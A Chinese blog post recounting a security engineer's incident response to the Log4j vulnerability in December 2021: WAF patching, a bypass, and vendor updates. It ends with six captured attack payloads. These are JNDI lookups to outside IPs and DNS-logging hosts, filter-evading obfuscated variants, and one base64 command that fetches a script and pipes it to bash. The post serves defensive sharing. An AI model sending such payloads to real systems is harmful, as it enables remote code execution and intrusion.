2021年12月13日星期一

关于Log4j组件漏洞的应急响应过程

依稀记得在之前应该是11月份的时候,阿里云的公众号就发了关于log4j组件的安全问题的预警,但是由于并没有实际的poc,所以没激起什么水花,我点开看看之后就忘到一边了。

直至上周四晚上(2021.12.09),很多群突然传log4j的消息,某公众号也深夜放出了poc(我已睡着)。

周五早上,打开手机一看,各个群已经翻天了,去到公司后赶紧联系领导、同事,说明此漏洞的情况,然后测试、验证、消化、输出相关教程给同事,waf也赶紧打上补丁进行拦截。

忙碌的周五上午就这么过去了。

晚上厂商发来新补丁,赶紧打,于是晚上11点多远程回公司给waf打补丁。

愉快的周末欢乐了两天。

周日晚上,朋友发了新的payload,一试,噢嚯,能绕过waf,完了。

周一去到公司联系厂家,他们说又有最新的补丁,坑,赶紧打上,打完测试,能拦截最新的payload了。

研发那边需要在下个版本才能投产更新log4j,在这之前,先由waf顶着吧。


Update:

一些在waf处抓的payload:


${jndi:ldap://45.83.193.150:1389/Exploit}


${jndi:rmi://${java:version}.uy483a.dnslog.cn/1}


${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://c6rht5b9g1rt2rilbafgcg5zrfaynab91.interactsh.com/a}


${${env:aaaa:-j}${env:aaaa:-n}${env:aaaa:-d}${env:aaaa:-i}:${env:aaaa:-l}${env:aaaa:-d}${env:aaaa:-a}${env:aaaa:-p}${env:aaaa:-:}//kfwd.idrkib.ceye.io/aa}


/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMTAuNDMuNDAuNjg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTEwLjQzLjQwLjY4OjgwKXxiYXNo}


${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:l}d${lower:a}${lower:p}}://kfwd2.idrkib.ceye.io/aa}


没有评论:

发表评论